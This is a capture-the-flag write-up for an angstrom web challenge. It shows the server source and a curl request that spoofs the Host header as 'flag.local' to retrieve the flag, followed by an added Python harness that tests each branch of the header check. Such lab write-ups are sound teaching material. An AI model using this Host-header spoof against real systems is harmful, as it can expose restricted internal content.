Description
Welcome to the tunnels!! Have fun!
Approach
We are provided with a website along with its source code.
Here is the Source Code:
# run via `uvicorn app:app --port 6000`
import os

SECRET_SITE = b"flag.local"
FLAG = os.environ['FLAG']

async def app(scope, receive, send):
    assert scope['type'] == 'http'
    headers = scope['headers']
    await send({
        'type': 'http.response.start',
        'status': 200,
        'headers': [
            [b'content-type', b'text/plain'],
        ],
    })
    # IDK malformed requests or something
    num_hosts = 0
    for name, value in headers:
        if name == b"host":
            num_hosts += 1
    if num_hosts == 1:
        for name, value in headers:
            if name == b"host" and value == SECRET_SITE:
                await send({
                    'type': 'http.response.body',
                    'body': FLAG.encode(),
                })
                return
    await send({
        'type': 'http.response.body',
        'body': b'Welcome to the _tunnel_. Watch your step!!',
    })
By examining the source code, we can see that the flag is read from an environment variable and is returned when the condition name == b"host" and value == SECRET_SITE is satisfied. That condition is only evaluated when the request carries exactly one host header.
To make the server reveal the flag, we need to send a single header with the name host and the value flag.local. When the server receives this header, it returns the flag in the response.
┌──(kali㉿iasad)-[~/CTFs/angstorm]
└─$ curl -H "Host: flag.local" https://pioneer.tailec718.ts.net/
actf{reaching_the_core__chapter_8}
Flag: actf{reaching_the_core__chapter_8}
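The Host check described above can be exercised without a running server by calling the ASGI app in-process, which shows that the only gate is a header value the client chooses. This is an added example, not part of the original writeup or the challenge's code: call_app, CASES, WELCOME and the placeholder FLAG value are constructed here, and app repeats the challenge's decision logic in condensed form.

```python
import asyncio

SECRET_SITE = b"flag.local"
FLAG = b"actf{constructed_placeholder}"  # constructed; the real app reads os.environ['FLAG']
WELCOME = b"Welcome to the _tunnel_. Watch your step!!"

async def app(scope, receive, send):
    # Same decision logic as the challenge source, condensed.
    assert scope["type"] == "http"
    headers = scope["headers"]
    await send({"type": "http.response.start", "status": 200,
                "headers": [[b"content-type", b"text/plain"]]})
    num_hosts = sum(1 for name, _ in headers if name == b"host")
    if num_hosts == 1:
        for name, value in headers:
            if name == b"host" and value == SECRET_SITE:
                await send({"type": "http.response.body", "body": FLAG})
                return
    await send({"type": "http.response.body", "body": WELCOME})

def call_app(headers):
    """Drive the ASGI app with a constructed scope and return the response body."""
    scope = {"type": "http", "method": "GET", "path": "/",
             # ASGI servers hand the app lowercased header names as byte pairs.
             "headers": [(k.lower(), v) for k, v in headers]}
    body = []

    async def receive():
        return {"type": "http.request", "body": b"", "more_body": False}

    async def send(message):
        if message["type"] == "http.response.body":
            body.append(message.get("body", b""))

    asyncio.run(app(scope, receive, send))
    return b"".join(body)

# Constructed header sets covering each branch of the check.
CASES = {
    "single matching Host": [(b"Host", b"flag.local")],
    "public hostname": [(b"Host", b"pioneer.tailec718.ts.net")],
    "duplicate Host": [(b"Host", b"flag.local"), (b"Host", b"flag.local")],
    "no Host": [],
    "port suffix": [(b"Host", b"flag.local:6000")],
}

if __name__ == "__main__":
    for label, headers in CASES.items():
        print(f"{label:22} -> {call_app(headers).decode()}")
```

Only the first case returns the flag; the comparison is an exact byte match, so a duplicated header or a port suffix falls through to the welcome message.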